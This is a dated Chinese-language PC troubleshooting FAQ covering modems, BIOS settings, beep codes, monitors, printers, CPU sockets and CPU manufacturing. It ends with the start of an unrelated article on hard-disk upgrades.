A:解答1：外置式的 Modem 是没有“软硬”之分的，所谓“硬猫”“软猫”是针对内置卡式猫来说的。Modem 在核心结构上主要由处理器和“数据泵”组成。处理器负责指令控制，“数据泵”负责底层算法。如果处理器和“数据泵”全部在卡上实现，这种 Modem 卡就是通常意义上的“硬猫”，“硬猫”不占用计算机主机的资源，在 DOS 下也可以使用。如果 Modem 卡上没有处理器和“数据泵”，这种 Modem 卡就是“软猫”，它的指令控制和底层算法借用计算机的 CPU 来完成。“软猫”大量占用计算机的资源，在安装使用上也不太方便。一般“软猫”都是 PCI 接口的，主要是考虑 PCI 总线速度较快。“软猫”的使用要用到 Windows 操作系统的一些特性，所以它在 DOS 下不能使用。

解答2：Modem 除了要完成数模转换外，还具有译码功能。为了降低成本，一些猫只提供了数模转换功能，控制及译码的功能则通过软件由 CPU 来完成，这样的猫就是软猫。所以软猫最大缺点就是占用 CPU 的时间及资源，但在传输的速度上，软猫与硬猫并无本质区别。对于外置的猫来说，如果是串口的，那么将全部是硬猫，如果是 USB 口，将会有九成以上是软猫。对于猫卡，软猫的比率相当大，如果要区别硬与软，就要看看卡上是否有 BIOS 和 Cache 芯片，如果有则证明是硬猫，如果没有则是软猫。

选择硬猫和软猫要看个人的喜好和预算，有许多人对软猫存在着偏见，但实际上软猫的表现也各不相同，就好像外置猫同样也并非个个优秀一样。如果选择 PCI 猫卡，推荐你看一下全向的 HCF/HSF 猫，速度很好，一般在 49333bps～50667bps 之间，它的抗干扰能力、兼容性都十分理想。当然，许多品质不佳的软猫也常具有抗干扰能力差，以及速度过低、易掉线等问题。

24,Q:BIOS 设置中，硬盘的“NORMAL”“LBA”“LARGE”模式各是什么意思?

A:NORMAL 普通模式是最早的 IDE 方式，在硬盘访问时，BIOS 和 IDE 控制器对参数不做任何转换。该模式支持的最大柱面数为 1024，最大磁头数为 16，最大扇区数为 63，每扇区字节数为 512，因此支持最大硬盘的容量为：512x63x16x1024=528MB。在此模式下，硬盘的实际物理容量再大，也只能用到其中的 528M。

LBA(Logical Block Addressing)逻辑块寻址模式。管理的硬盘空间可达 8.4GB。在 LBA 模式下，设置的柱面、磁头、扇区等参数并不是实际硬盘的物理参数。在访问硬盘时，由 IDE 控制器把由柱面、磁头、扇区等参数确定的逻辑地址转换为实际硬盘的物理地址。在 LBA 模式下，可设置的最大磁头数为 255，其余参数与普通模式相同，由此可以计算出可访问的硬盘容量为：512x63x255x1025=8.4GB。不过现在新主板的 BIOS 对 INT13 进行了扩展，使得 LBA 能支持 100GB 以上的硬盘。

LARGE 大硬盘模式，在硬盘的柱面超过 1024 而又不为 LBA 支持时采用。LARGE 模式采用的方法是把柱面数除以 2，把磁头数乘以 2，其结果总容量不变。在这三种硬盘模式中，现在 LBA 模式使用最多。

25,Q:BIOS 设置中，并口的三种类型“Normal”“EPP”“ECP”各是什么意思?
A:目前主要有三种类型的并口：“Normal”、“EPP”和“ECP”。其中 Normal 又分为 4bit、8bit、半8bit 等几类。Normal 是一种低速的并口模式，适合打印输出。EPP口(Enhanced Paralle Port)，即增强并行口，是由 Intel、Xircom、Zenith 等一些公司开发的，目的是在外部设备间进行双向通讯，自 1991 年开始笔记本电脑率先配备有 EPP口。ECP口(Extended Capabilities Port)即扩展并行口，由 Microsoft 和 HP 开发，它具有和 EPP 一样的速率和双向通讯能力，但在多任务环境下，它能使用 DMA(直接存储器访问) 方式，所需缓冲区也不大。

    目前的主板大都支持以上三种并口模式，为尽量增强并口的性能一般都将并口设定为 ECP+EPP，但如果当连接并口的外设出现兼容性错误时，应该将并口设置为 Normal 模式。

26,Q:外置调制解调器拨号时在有拨号音的情况下，总是发生错误，显示“错误 678”，意思好像是说“拨入对方的计算机没有响应”。机器的协议安装没有问题。请问这是什么原因?

A:678 错误是由于 ISP 方的服务器拥挤或超时响应造成的，一般不是 Modem 的问题，请在其它时段再拨号试试。也可以试拨一下其它的 ISP 看是否正常，以确定 Modem 是无问题的。另外某些 ISP 当遇到用户名或口令错误的时候会以“不响应信号”返回，所以也不要忘了检查一下登录口令和密码是否正确。

27,Q:一只全向 HCF 内置“猫”在用201卡上网时速度仅 14kbps，用家中电话上网速度为 49.333kbps，为什么?

A:因为使用 201 电话卡拨号上网是采用纯模拟信号交换接入的，就好像我们打电话或发传真一样，并不是数模转换接入式的，因为纯模拟信号传输率最高只支持到 14000bps，所以就会发生这种情况。

28,Q:如何测试猫的实际速度，有人说，自己给自己发一份 1MB 的信，然后记录收信时间，然后用 1024×1000/n×60（n为收信分钟数）；另有人说，收信软件不同，收同一封信 n 值就不同，到底怎么测?
A:通过发信收信来判断猫的性能是不可取的，因为收信发信与 ISP、POP3、SMTP 服务器的关系都很大，这个时间往往是不固定的。如果想测 Modem 的实际传输率，可以安装一些 Modem 的监控软件，这样可以实时记载 Modem 的工作状况(例如神探 Medic 软件)。

29,Q:中凌雷公的 Yamaha 724 声卡，以前它就和 Kill98 有冲突。现在安装了联想的内猫。问题是：不上网时，听音乐、玩有音乐的游戏都很好，但上网后就容易死机。在硬件配置文件里将声卡禁用再上网就没事了。是声卡和 Modem 有冲突吗?

A:Yamaha 724 的兼容性实际上是不错的，只是在极少数的主板上才可能发生一些类似兼容性不良的问题。对于声卡不兼容的情况比较难解决，仅仅更新驱动程序效果不是很明显，如果主板与声卡存在不兼容的问题，最好的解决办法就是更换其中之一。另外，应注意的是，PCI 猫卡的兼容性不是特别理想，相对声卡来说发生不兼容的情况较多，所以也可以考虑更换其它品牌的猫卡以及猫卡的驱动程序。

30,Q:Linux 中 NE2000 兼容网卡的安装?
A:目前市场上 NE2000 兼容网卡比较多,如 D-Link DE220p 等。如果 Linux 不能检测到这些网卡，则可以用手动的方法安装。以 D-Link DE220p 网卡为例，在 Red hat Linux6.0 和 Turbo Linux 下可以这样安装：首先检测出网卡的 IO 端口号和 irp 号，然后启动进入 Linux，在 /etc/rc.d/rc.sysinit 文件中加入语句(假设网卡的 IO=0x240,irp=0x5)：
modprobe ne.o io=0x240 irq=5
然后启动Linux即可。

    对于 Slackware Linux,可以编辑 /etc/rc.d/rc.modules 文件，将 NE2000 网卡驱动前的注释符号“#”去掉，设置网卡 IO 号即可,即:
/sbin/modprobe ne io=0x240

31,Q:调整 COMS 设置，加快机器启动速度：
A:计算机在启动的时候会对电脑做一系列的检测，而这些检测并不总是必须的，你可以在 CMOS 中进行优化设置，加快电脑启动速度。方法如下：开机后按 Del 键进入 CMOS 设置，将“Quick Boot”设为 Enable，这样可使机器启动时不检测 1MB 以上的内存。再将硬盘的参数用 CMOS 测出，不要使用 AUTO，其他没有接硬盘的 IDE 通道都设置成 NONE，这样启动的时候就不会去检测每个端口的设备了。如果你不经常用软盘启动，还可以将启动顺序改成 C Only，这样就可以直接从硬盘启动，而不用先去读软驱或者其他设备然后再到转到硬盘启动了。如果你不用 USB 设备等硬件，把它们也给关上。

32,Q:电脑启动时报告“Waring:SPD not found at dimme”是怎么回事?
A:一般符合 PC100 的内存条都带有 SPD，它是内存条上的一块 EEPROM，包含了内存条的一些技术参数(如内存的类别、容量、工作频率、速度和电压等)。电脑在启动时，如果你作了设定，CMOS 会自动去读取内存条 SPD 中的参数，如果内存条没有 SPD 就会发生前述错误，这时就应当手动设置内存参数并关掉 SPD 自动设定开关。

33,Q:Windows 下 EPSON LQ1600K 打印机只能单向打印的解决办法：

A:可以使用 STAR 3240 打印机的驱动程序代替 1600K 的驱动程序来试试，基本可以满足要求，使打印机进行双向打印。如果打印表格时竖线有扭曲现象，可以按打印机上的“单向打印”按纽暂时进行单向打印。

34,Q:电脑的 CPU 降温风扇经常发出“怒吼”声，搅得人心神不安，怎么办?

A:给它的转轴加注润滑油。方法：揭开转轴一端的纸片，会看到转轴，加适量的缝纫机油(甚至是食用油)进行润滑，会大大降低 CPU 风扇的噪音。

35,Q:解决飞利浦显示器与 Photoshop 5.0 的冲突：
A:将显示器设置为即插即用或用其他品牌的显示器。也可以将显示属性中加载的 ICC 文件更改为其他 ICC 配置文件试试看。

36,Q:如何关闭 Modem 的声音?
A:双击“控制面板”中的“调制解调器”图标，在“常规”选项卡单击“属性”按钮，将扬声器音量设置为“关闭”。对于已经建立好的连接，打开其“属性”设置窗口，点击其连接方式下“设置”按钮，将扬声器音量设置为“关”。

37,Q:主板电池电量不足导致的问题：
A:有一台机器，故障现象：不能维持 CMOS 时钟时间；每次关机后 CMOS 数据丢失；开机时必须连续迅速按电源开关 2 次才能启动(只按一次机器黑屏，不能启动)。这是典型的主板电池电量不足导致的问题。更换电池后故障消失。

38,Q:听声音，判故障：
A:电脑出现启动故障时都会发出不同的鸣叫声提示故障的部位，下面列举出 AMI BIOS 和 Award BIOS 鸣叫声的含义：
AMI BIOS：
1 短 内存刷新失败
2 短 内存 ECC 校验错误
3 短 系统基本内存(第一个 64K)自检失败
4 短 系统时钟出错
5 短 CPU 出错
6 短 键盘控制器错误
7 短 系统实模式错误，不能进入保护模式
8 短 显示内存错误
9 短 主板 Flash ROM 或 EPROM 检验错误
1长3短 内存错误(如内存芯片损坏)
1长8短 显示系统测试错误(如显示器数据线或显卡接触不良)

Award BIOS：
1 短 系统正常启动
2 短 常规错误。应进入 CMOS Setup，重新设置不正确的选项
1长1短 内存或主板出错
1长2短 显示器或显卡错误
1长3短 键盘控制器出错
1长9短 主板 FlashRAM 或 EPROM 错误(如 BIOS 被 CIH 破坏)
不间断长鸣 内存未插好或芯片损坏
不停响声 显示器未与显卡连接
重复短鸣 电源故障

39,Q:电脑启动时为什么等待...?
A:站长的机器从 1999 年买回来到今天，每次启动时在启动到 Wait... 时总是停在那里，非要按一下键盘才能继续。一直以为是主板的故障，但机器使用一切正常。后来给 CMOS 放了一次电，还是没有解决问题。最近修理一台主机时，插上了我的外围设备，该主机启动时也是在 Wait... 处无限等待，我才猛然意识到有可能是键盘故障，果然，换上另外的键盘后，故障消失。

40,Q:删除 Windows 重复安装的设备:
A:某机器的声卡驱动程序在“系统/设备管理器”中显示了两次，一个前边由黄色惊叹号，但实际只有一个声卡，也没有发生设备硬件冲突，也不影响使用。解决办法：将两个重复的硬件全部删除，重新启动机器，自动安装完毕，恢复正常。

41,Q:将主板的外频超高时，主板上的集成声卡 AC'97 就没有声音输出了，为什么?
   A:由于声卡集成在主板上，所以与主板的外频关系密切。如果外频调的太高，声卡就有可能不发声了。

42,Q:HP-LJ6L 激光打印机在连续打印时，常会出现卡纸现象(除非打出一张，取出一张)，且有时是卡在滚动轴下，只能看见，手却碰不到，只能将此机全拆下来，非常麻烦。不知哪位有简便的方法可不拆机就能将纸取出来?

A:对不起，目前似乎没有更好的解决办法，只有开盖取硒鼓。不过经常卡纸并非正常现象，应该送去维修部检查一下。另外，经常强行撕拉硬拽夹在打印机里的纸张，很可能会导致硒鼓损坏。

43,Q:Epson 彩色喷墨打印机打不出红色的字体，打印出来的字是黄色的
A:故障原因很可能是墨盒用尽或者堵塞，像偏色、缺色等等故障现象一般都是这个原因。现在 Epson 的假冒墨盒很多，哪怕是新购的打印机，也会有些 js 偷换原装墨盒。Epson 的打印机的出墨孔很细，所以墨水稍微有些问题就会堵塞了，你可以用画笔之类的图像处理软件画一个纯红图片，打几十几张即可让驱动“用完”红墨水，就可以换一个墨盒再试一试了。

44,Q:解决 Windows 下 Epson 1600k 针式打印机不能双向打印的问题：

A:用 STAR-3240 打印机的驱动程序代替 1600k 的驱动程序，可以实现双向打印。但是如果出现异常，就只能使用 1600K 自己的驱动程序(当然就不能双向打印了)。1600K 打印机在 DOS 下使用正常，可能是其 Windows 驱动程序不完善导致了这个问题。

45,Q:主板最后一条 PCI 槽导致的问题：
   A:根据许多专家、准专家的经验：主板的最后一条 PCI 插槽经常与内猫、网卡、显卡等硬件发生莫名其妙的兼容性故障，所以如果遇到这种情况，请在排除板卡本身故障的情况下，把板卡插在别的 PCI 插槽上试试，没准儿能排除故障。

46,Q:问：欲烧录一张光盘，想让它自动运行盘上根目录下的 index.htm 文件，在 autorun.inf 文件中填上open=index.htm，它却不吃这一套，怎么办?
A: autorun.inf 文件中只能指定可执行文件，要自动运行 html 文件可以这样做： open=IEXPLORE.EXE index.htm

47,Q:在 Windows 桌面上仔细看显示器上有红色的小点，但肯定不是显示器的问题，请问是 Windows98 出了问题还是别的原因?
A:可能是显示卡上显存的问题，在 DOS 行文本方式下看不出来，到 Windows 的 256 色以上显示模式中就能看出。

48,Q:一台笔记本电脑忘记了开机密码，内有重要文件，怎么办?

A:1、到产品的售后服务中心得到服务(记得带上有效证件)；2、将硬盘拆下，拿到别人的机器上去读取重要数据；3、去除键盘的挡板然后撬开键盘，取出蓝色的电池过一会儿就行了，不过这个办法不是对所有的笔记本都有用的，有些笔记本的密码没有依靠电池记忆。

49,Q:显示器上有一到二条白线从下往上运动，时间越长就越多越明显，不知为何?
A:显示器电源有问题(纹波干扰)，必须维修。

50,Q:Windows 下显示器不定期的发出刺耳声响(声音不是很大)，MS-DOS 下声响消失，这是为什么? 怎么解决?
   A:降低显示器刷新频率试试。显示器存在一个带宽问题(带宽等于分辨率*刷新率)，如果它大于或接近于显示器出厂时指定的值，就会因为行输出过大而出现过载现象，发出刺耳的声音，在这种状态下显示器极易损坏。

51,Q:关机前调好屏幕尺寸的显示器，在开机后屏幕的宽、高都变小了，怎么办?
A:如果一直都是这样，那很可能是显示器里的存储电路失效了，要送去维修的。也可以换一个刷新频率试试，不要用“优化”，可能用“72HZ”、“75HZ”就好了。

52,Q:显示器有时突然彩色失真，但过了一段时间又恢复正常，请问这是怎么回事啊?
A:很可能是被磁化了。每次开机显示器都会自动消磁，因此用用就正常了，基本不需修理。但要找找磁化的原因，不要把音箱、磁化杯等靠近显示器。但是如果磁化很严重且在包换期内，最好去换一台，因为被严重磁化的显管很难恢复原来的正常色彩。

53,Q:某机，打开显示器后如果五秒种之内不开主机，那么显示器进入无信号状态，再开主机无效，是怎么回事啊?
A:将 BIOS 中的 ACPI 功能关掉试试。可能是主板内建的电源管理的问题。

54,Q:有什么办法让一个电脑连两个游戏杆?
A:接多手柄的方法有好几种，装双声卡(最好是isa + pci，冲突的可能性小)是一种，如果能买到专用双打线或者双打卡也不错，现在多为并口的多手柄连接器，一般柜台都有售。

55,Q:Win98 可播放硬盘上的音频、视频文件，可正常播放 VCD。但用光盘放 CD 无声，不知是何原因?
A:没有插接 CDROM --> 声卡的音频线，或插接错误。

56,Q:避免双硬盘的盘符交错现象
A:(1)、升级操作系统到 Windows2000。Windows2000 已经解决了硬盘盘符交错的现象;

   (2)、在 CMOS 中将第二块硬盘设为“NONE”。这样处理后，在 Windows98 图形界面下就不会看到盘符交错了。缺陷是在 Windows98 的 DOS 方式下看不到第二硬盘，而且对 Windows95 不适用。

   (3)、在把第二硬盘挂接到你的机器后，对它进行重新分区：先删掉第二硬盘上的所有分区，再把它的所有空间建立成一个扩展 DOS 分区(不能建立主 DOS 分区 - Primary DOS Partition)，再根据需要划分逻辑分区。这样处理后，两个硬盘的分区就会按顺序正确排列了。

57,Q:在华硕 cubx 主板上安装 Windows2000
A:在配备华硕 cubx 主板的机器上直接安装 Windows2000 会出现蓝屏，提示此电脑硬件不适宜安装 Windows2000。这是因为没有使用该主板针对 Win2000 的一些驱动程序。正确安装方法是：按 F1 进入安装，等出现 winsetup 安装的蓝色界面时，按 F6，插入预先做好的软盘，按 S 回车。以后一路回车，就可以进入正常安装状态。预先做好的软盘里包含文件：ATAPI.SYS、CMDIDE.INF、OEMSETUP.INF、CMDIDE.SYS、DISK1、PCIIDEX.SY_、README.TXT、TXTSETUP.OEM、CMDCFGNT.EXE、CSA64XX.SYS。 这些文件可以在华硕主板驱动光盘里找到。

58,Q:电脑散热的注意事项
   A:随着电子技术的不断发展，电脑更新换代的速度越来越快，自去年 AMD 跨越 1GHz 的 CPU 之后，不到半年的时间，我们使用的电脑已经具有高达 1.4G 甚至 2G 的速度了。但由于 CPU 本身的集成度很高，随着其主频提升，相应的就会产生较高的功耗，这样发热量也会随之提升。所以在炎热的夏天，那些使用高主频高性能电脑的朋友就应该注意其电脑的散热了。
   其实，CPU 生产厂商也为用户考虑到这个问题，所以大家在自己攒电脑购买 CPU 时，经销商们都善意的提醒大家购买与 CPU 相应的风扇。目前市面上凡高于 1GHz 的 CPU 如 Pentium III、Pentium 4、Athlon 都对散热有着严格的要求。我们可以看到，1GHz 以上的 Pentium III 几乎没有散装的产品，这就是因为盒装中配合的散热风扇是专门设计，能够更好的解决散热问题。同样，Pentium 4 的功率更是目前 CPU 之最，其散热系统需要专门的加强，否则会影响系统的稳定甚至威胁到 CPU 的寿命。相比之下，AMD Athlon 的 CPU 由于价格便宜，使我们能够更多的接触到 1GHz 以上的产品，但散热问题仍需重视，只要配上经由 AMD 确认过的风扇就能够让 Athlon 清凉度夏。回顾 CPU 发展的历史，可以看到散热问题逐步被重视的过程。
   在 286、386 时代，CPU 功率较低，因此不需要考虑散热问题，早期的产品不过是一个陶瓷封装；到了 486 时期，CPU 功率有所提升，“散热片”逐渐出现在 CPU 的表面，而且已经有了带有散热风扇的产品，不过这还属于一个“可有可无”的部分；在K6以及Pentium MMX时代，风扇成为了CPU的标准配置，离开了风扇，CPU的寿命就会受到影响；在采用散热片+风力加强的设计之后，一直没有得到新的方式从外界对 CPU 进行散热的加强，因此开始从内部入手：从 CPU 的设计上，放弃了陶瓷封装，而在上面采用了金属外壳导热的设计，令 CPU 内核能够更好的把热量传导到外壳，再通过散热片和风扇进行散热；然后现在的 CPU 又舍弃了金属外壳，让其内核直接与散热系统相连，对散热进一步加强。
   夏天到了，在炎热的环境中，对 CPU 的散热问题要进行更加全面的考虑，下面我来给大家讲讲 CPU 散热应该注意的几个问题。
选择一款合适的风扇。对于 CPU 散热来说，首先要做好风扇的选择，盒装的 CPU 一般都配有比较适合的风扇，而且一般情况下性能十分优秀，因此选购盒装的CPU就不用自己麻烦风扇的问题了。如果选择了散装的CPU，那么就一定要选一个性能优越的风扇，目前市场上的风扇选择比较繁多，但是良莠不齐，练就一副“火眼金睛”可不容易，我们先了解一下应该怎样选择风扇：首先，选择风扇要注意散热片的设计，毫无疑问，散热片的表面积越大散热效果越好，这应该是一个很直观的效果，很容易观察出来。其次，散热片的导热性要好。导热性应该是物理上很专业的性能指标，不过我们也可以通过简单的方法判断。直接在室温下用手摸散热片的表面，感觉比较凉的导热性较好，感觉比较热的导热性较差。另外，一般情况下导热性好的散热片都是采用铜制的，重量较重。而导热性较差的风扇散热片为铝制，重量较轻。
    风扇之间的价格差异很大，最便宜的仅仅十几元，最贵的可能达到数百元，考虑到直接影响着 CPU 寿命的问题，这里多花一点钱也是值得的。但是，并不是价格越贵就一定越好，选择 CPU 厂商推荐的产品才是最重要的。
适当安装风扇。在解决散热问题的时候，风扇的安装也是很重要的，要保证散热片与　 CPU 之间充分的接触，一般情况下适量的涂抹硅胶会给散热效果带来很明显的提升。

    机箱选择亦重要，自己动手来散热。机箱的选择对散热也有很大的影响，一般应该尽量选择比较“大”的机箱，保证机箱内足够的散热空间十分重要。最好能够在机箱的后测上部加装风扇，同时保证机箱的前下部有进风口，两个风扇总价格不过 20元，但是给机箱内的散热环境带来了很大的好处。安装机箱风扇的时候也要注意，从设计上来看，比较合理的方式是机箱前面的风扇向机箱内吹风，后面的向外，保证空气的流动。
空调房，电脑好去处。在有空调的房间内使用电脑也是保持电脑寿命的一大法宝，室温降低之后，对于电脑及其内部配件的散热来说条件更有利，更何况人也舒适……面对越来越热的夏季，为了保证你的电脑更长久的使用寿命，一定要注意散热问题啊！

59,Q:可不可以用 USB 口连接两台 WIN98 电脑?
A:USB 双机互连要用专用的 USB Link-100 电缆配上它的专用驱动和软件。此电缆售价昂贵，且有效距离大约只在 5M 之内。如果用普通 USB 电缆连接两台计算机，当然是不可能的了。

60,Q:CPU 的插座和插槽 Slot、Socket、Slocket 介绍
A:Slots、Sockets 和 Slocket 都是用来把 CPU 安装在主板上的。在 1981 年 IBM 的 PC 机刚出炉时，CPU 8086 是直接焊在主板上的，接着的 286、386 也都是焊在主板上，很不好拆卸，对普通用户来说一旦买了一台计算机就基本上没有什么升级的余地了。到了 486 以后，处理器厂商开始采用插座或插槽来安装 CPU。目前市场上的各种 CPU 种类繁多，所用的插座和插槽也很多，本文就给大家介绍一下各种 CPU 的插座和插槽。

     Socket 1：Intel 开发的最古老的 CPU 插座，用于 486 芯片。有 169 个脚，电压为 5V。最多只能支持 DX4 的倍频。

     Socket 2：Intel 在 Socket 1 的基础上作了小小的改进得到 Socket 2。Socket 2有 238 个脚，电压仍为 5V。虽然它还是 486 的插座，但只要稍作修改就可以支持 Pentium 了。

     Socket 3：Socket 3 是在 Socket 2 的基础上发展起来的。它有 237 个脚，电压为 5V，但可以通过主板上的跳线设为 3.3V。它支持 Socket 2 的所有 CPU，还支持 5x86。它是最后一种 486 插座。

     Socket 4：Pentium 时代的 CPU 插座从 Socket 4 开始。它有 273 个脚，工作电压为 5V。正是因为它的工作电压太高，所以它并没有怎么流行就被 Socket 5 取代了。Socket 4 只能支持 60－66MHz 的 Pentium。

     Socket 5：Socket 5 有 320 个脚，工作电压为 3.3V。它支持从 75MHz 到 133MHz 的 Pentium。Socket 5 插座在早期的 Pentium 中非常流行。

     Socket 6：看名字你也许会认为这是一个 Pentium 插座，但实际上 Socket 6 是一个 486 插座。它有 235 个脚，工作电压为 3.3V，比 Socket 3 稍微先进一点。不过随着 Pentium 的流行，486 很快就不再是市场的主流，Socket 6 也很快就被人遗忘了。

     Socket 7：Socket 7是到目前为止最流行和应用最广泛的CPU插座。它 有321个脚，工作电压范围为2.5-3.3V。它支持从75MHz开始的所有Pentium处理器，包括Pentium MMX，K5, K6, K6-2, K6-3, 6x86, M2和M3。Socket 7是由Intel发布的，事实上已成为当时的工业标准，可以支持IDT、 AMD和Cyrix的第六代CPU。但Intel在开发自己的第六代CPU－Pentium II是，却决定舍弃Socket 7，另外开创一个局面。

     Socket 8：Socket 8 是 Pentium Pro 专用的插座。它有 387 个脚，工作电压为 3.1/3.3V。它还为双处理器的主板做了特殊的设计。但随着市场主流从 Pentium MMX 转向 Pentium II，Socket 8 很快就被遗忘了。

     Slot 1：Slot 1 的出现彻底改变了 Intel 的 CPU 插座一贯的形状。Intel 原来的 CPU 都是四方的，管脚在芯片的底部，安装时 CPU 插在主板的插座上。而 Pentium II 不再是四方的了，处理器芯片焊在一块电路板上，然后这块电路板再插到主板的插槽中，这个插槽就是 Slot 1。采用这种设计处理器内核和 L2 缓存之间的通信速度更快。Slot 1 有 242 个脚，工作电压为 2.8-3.3V。Slot 1 主要用于 P2，P3 和 Celeron（赛扬），另外还有

    Socket 8 的转接卡用来安装 Pentium Pro。

    Slot 2：Slot 2 是 Slot 1 的改进，主要用于 Xeon 系列处理器。Slot 2 有 330 个脚，它和 Slot 1 之间最大的区别就在于 Slot 1 的 CPU 和 L2 缓存只能以 CPU 工作频率的一半进行通信，而 Slot 2 允许 CPU 和 L2 缓存以 CPU 工作频率进行通信。

    Socket 370：从名字就可以看出 Socket 370 插座有 370 个管脚。在 Intel 找到了把处理器内核和 L2 缓存很便宜的做在一起的方法之后，它的 CPU 插座从 Slot 回到了 Socket。Socket 370 是基于 Socket 7 的，它不过只是在插座的四边每一边加了一排管脚。首先采用 Socket 370 的是 PPGA 封装的 Celeron，接着是 FC-PGA 封装的 Pentium III 和 Celeron II。同样也有 Socket 370 到 Slot 1 的转接卡。目前 Intel 的主流 CPU 都是 Socket 370 类型的。

        Slot A：由于 Intel 给 Slot 1 申请了很全面的专利，AMD 不能象从前那样照搬 Intel 的插座，所以 AMD 独立开发了 Slot A，Slot A 是 AMD 拥有独立知识产权的 CPU 插座，主要用于 Athlon 系列处理器。它的设计和 Slot 1 类似，但采用的协议不一样，它用的是 EV6 总线协议。采用 EV6 总线协议，CPU 和内存之间的工作频率可以达到 200MHz。目前随着 Athlon 处理器越来越流行，Slot A 的主板也越来越多。

        Socket A：当 Intel 从 Slot 转回 Socket 时，AMD 也亦步亦趋，从 Slot A 转回了 Socket A。0.18 微米的 Athlon 和 Duron 都采用 Socket A 插座，它也支持 200MHz 以及 266MHz 的 EV6 总线。与 Socket 370 不同的是，Socket 370 CPU 可以直接用 Socket 7 的散热器，而 Socket A 的散热器要稍作修改。另外 AMD 没有提供 Socket A 到 Slot A 的转接卡。Socket A 有 462 个脚，它与 Socket 370 不兼容。目前 AMD 的主流 CPU 都是 Socket A 类型的。

        Slockets：所谓的 Slocket 是 Slot 和 Socket 的结合体，从它的拼法上就可以看出。它实质上是一个Slot 1 到 Socket 370 的转接卡，在不同的电平和接口之间进行转换。有的 Slocket 可以插两个 CPU，还有的 Slocket 可以去除 CPU 的锁频，使超频更容易。
        以上给大家介绍了一下已有的各种 CPU 插座和插槽，希望用户在升级的时候，注意要买自己的主板能支持的 CPU。

61,Q:CPU 的制做过程和工艺
A:CPU 发展至今已经有二十多年的历史，其中制造 CPU 的工艺技术也经过了长足的发展，以前的制造工艺比较粗糙，而且对于读者了解最新的技术也没有多大帮助，所以我们舍之不谈，用今天比较新的制造工艺来向大家阐述。

    许多对电脑知识略知一二的朋友大多会知道 CPU 里面最重要的东西就是晶体管了，提高 CPU 的速度，最重要的一点说白了就是如何在相同的CPU面积里面放进去更加多的晶体管。由于 CPU 实在太小，太精密，里面组成了数目相当多的晶体管，所以人手是绝对不可能完成的（笑），只能够通过光刻工艺来进行加工的。这就是为什么一块 CPU 里面为什么可以数量如此之多的晶体管。晶体管其实就是一个双位的开关：即开和关。如果您回忆起基本计算的时代，那就是一台计算机需要进行工作的全部。两种选择，开和关，对于机器来说即0和1。那么如何制作一个CPU 呢? 以下我们用英特尔为例子告诉大家。

    首先：取出一张利用激光器刚刚从类似干香肠一样的硅柱上切割下来的硅片，它的直径约为 20cm。除了 CPU 之外，英特尔还可以在每一硅片上制作数百个微处理器。每一个微处理器都不足一平方厘米。

    接着就是硅片镀膜了。相信学过化学的朋友都知道硅(Si)这个绝佳的半导体材料，它可以电脑里面最最重要的元素啊！在硅片表面增加一层由我们的老朋友二氧化硅(SiO2)构成的绝缘层。这是通过 CPU 能够导电的基础。其次就轮到光刻胶了，在硅片上面增加了二氧化硅之后，随后在其上镀上一种称为“光刻胶”的材料。这种材料在经过紫外线照射后会变软、变粘。然后就是光刻掩膜，在我们考虑制造工艺前很久，就早有一非常聪明的美国人在脑子里面设计出了 CPU，并且想尽方法使其按他们的设计意图工作。CPU 电路设计的照相掩膜贴放在光刻胶的上方。照相字后自然要曝光“冲晒”了，我们将于是将掩膜和硅片曝光于紫外线。这就象是放大机中的一张底片。该掩膜允许光线照射到硅片上的某区域而不能照射到另一区域，这就形成了该设计的潜在映像。

    一切都办妥了之后，就要到相当重要的刻蚀工艺出场了。我们采用一种溶液将光线照射后完全变软变粘的光刻胶“块”除去，这就露出了其下的二氧化硅。本工艺的最后部分是除去曝露的二氧化硅以及残余的光刻胶。对每层电路都要重复该光刻掩膜和刻蚀工艺，这得由所生产的 CPU 的复杂程度来确定。尽管所有这些听起来象来自“星球大战”的高科技，但刻蚀实际上是一种非常古老的工艺。几个世纪以前，该工艺最初是被艺术家们用来在纸上、纺织品上甚至在树木上创作精彩绘画的。在微处理器的生产过程中，该照相刻蚀工艺可以依照电路图形刻蚀成导电细条，其厚度比人的一根头发丝还细许多倍。

    接下来就是掺杂工艺。现在我们从硅片上已曝露的区域开始，首先倒入一化学离子混合液中。这一工艺改变掺杂区的导电方式，使得每个晶体管可以通、断、或携带数据。将此工 艺一次又一次地重复，以制成该 CPU 的许多层。不同层可通过开启窗口联接起来。电子以高达 400MHz 或更高的速度在不同的层面间流上流下，窗口是通过使用掩膜重复掩膜、刻蚀步骤开启的。窗口开启后就可以填充他们了。窗口中填充的是种最普通的金属－铝。终于接近尾声了，我们把完工的晶体管接入自动测试设备中，这个设备每秒可作一万次检测，以确保它能正常工作。在通过所有的测试后必须将其封入一个陶瓷的或塑料的封壳中，这样它就可以很容易地装在一块电路板上了。

    目前，单单 Intel 具有 14 家芯片制造厂。尽管微处理器的基本原料是沙子(提炼硅)，但工厂内空气中的一粒灰尘就可能毁掉成千上万的芯片。因此生产 CPU 的环境需非常干净。事实上，工厂中生产芯片的超净化室比医院内的手术室还要洁净1万倍。“一级”的超净化室最为洁净，每平方英尺只有一粒灰尘。为达到如此一个无菌的环境而采用的技术多令人难以置信。在每一个超净化室里，空气每分钟要彻底更换一次。空气从天花板压入，从地板吸出。净化室内部的气压稍高于外部气压。这样，如果净化室中出现裂缝，那么内部的洁净空气也会通过裂缝溜走－防止受污染的空气流入。 但这只是事情一半。在芯片制造厂里，Intel 有上千名员工。他们都穿着特殊的称为“兔装”的工作服。兔装是由一种特殊的非棉绒、抗静电纤维制成的，它可以防止灰尘、脏物和其它污染损坏生产中的计算机芯片。这兔装有适合每一个人的各种尺寸以及一系列颜色，甚至于白色。员工可以将兔装穿在在普通衣服的外面，但必须经过含有 54 个单独步骤的严格着装程序。而且每一次进入和离开超净化室都必须重复这个程序。因此，进入净化室之后就会停留一阵。在制造车间里，英特尔的技术专家们切割硅片，并准备印刻电路模板等一系列复杂程序。这个步骤将硅片变成了一个半导体，它可以象晶体管一样有打开和关闭两种状态。这些打开和关闭的状态对应于数字电码。把成千上万个晶体管集成在英特尔的微处理器上，能表示成千上万个电码，这样您的电脑就能处理一些非常复杂的软件公式了。


硬盘升级要注意的几个问题

《一键清理系统垃圾》

硬盘升级要注意的几个问题

   对用户来说，追求硬盘容量的欲望总是无止境的，几年前1G的硬盘大家用得上好，如今面对身驱日益肥胖的应用软件，你经常会发现硬盘的空间总是不够用，10G的硬盘也已成为昨日黄花。升级硬盘已经成为当务之急，以下就谈谈升级硬盘需要注意的几个问题。

一、应该买哪一类型的硬盘
